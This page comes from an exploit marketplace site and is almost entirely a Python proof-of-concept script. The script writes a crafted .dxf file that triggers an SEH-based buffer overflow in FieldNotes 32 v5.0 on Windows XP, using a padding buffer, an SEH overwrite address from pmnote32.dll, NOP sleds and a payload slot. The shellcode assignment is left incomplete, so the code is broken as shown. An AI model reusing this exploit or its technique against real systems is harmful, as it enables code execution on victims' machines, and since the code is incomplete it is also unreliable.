[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FieldNotes 32 v5.0 Buffer Overflow (SEH)

Security Risk Unsored
local exploits
Date add
FieldNotes 32 v5.0 Buffer Overflow (SEH)

# Title:                FieldNotes 32 v5.0 (SEH) 0day
# Date:         25/06/2010
# Author:               TecR0c - http://tecninja.net/blog aka Rocco Calvi
# Found by:             TecR0c - http://twitter.com/TecR0c
# Advisory:     http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053
# Platform:             Windows XP sp3 En
# Greetz to:            Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# This software is known to be used by Power Authorises
# Usage: Launch Application > Open > Navigate to Map > Double click > BOOM
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] FieldNotes SEH (.dxf) - by TecR0c"
msg = ( # TITLE=Corelan TEXT="TecR0c pwned you"
structure = "\x59\x6F\x75\x20\x77\x69\x6C\x6C\x20\x64\x69\x65"
structure += '\n'
structure += "\x53\x45\x43\x54\x49\x4F\x4E"
structure += '\n'
structure += "\x20\x20\x20\x32"
structure += '\n'
structure += "\x48\x45\x41\x44\x45\x52"
structure += '\n'
structure += "\x20\x20\x20\x39"
structure += '\n'
structure += "\x24\x48\x41\x4E\x44\x4C\x49\x4E\x47"
structure += '\n'
structure += "\x20\x20\x20\x37\x30"
structure += '\n'
structure += "\x31"
structure += "\n"
structure += "\x20\x20\x20\x39"
structure += '\n'
structure += "\x48\x41\x4E\x44\x53\x45\x45\x44"
structure += '\n'
structure += "\x20\x20\x20\x35"
structure += '\n'
structure += "\x20\x20\x20\x20\x31\x38\x30\x30"
structure += '\n'
structure += "\x20\x20\x20\x39"
structure += '\n'
structure += "\x24\x45\x58\x54\x4D\x49\x4E"
structure += '\n'
structure += "\x20\x20\x20\x31\x30"
structure += '\n'
buff = "\x44" * 500
buff += "\x2d\xd9\x6e\x01" # 0x016ED92D [pmnote32.dll]
buff += "\x42" * 4
buff += "\x90" * 50
buff += msg
buff += "\x90" * 100
tecfile = open('TecR0c.dxf','w');
tecfile.write(structure + buff)

#  0day.today [2024-12-23]  #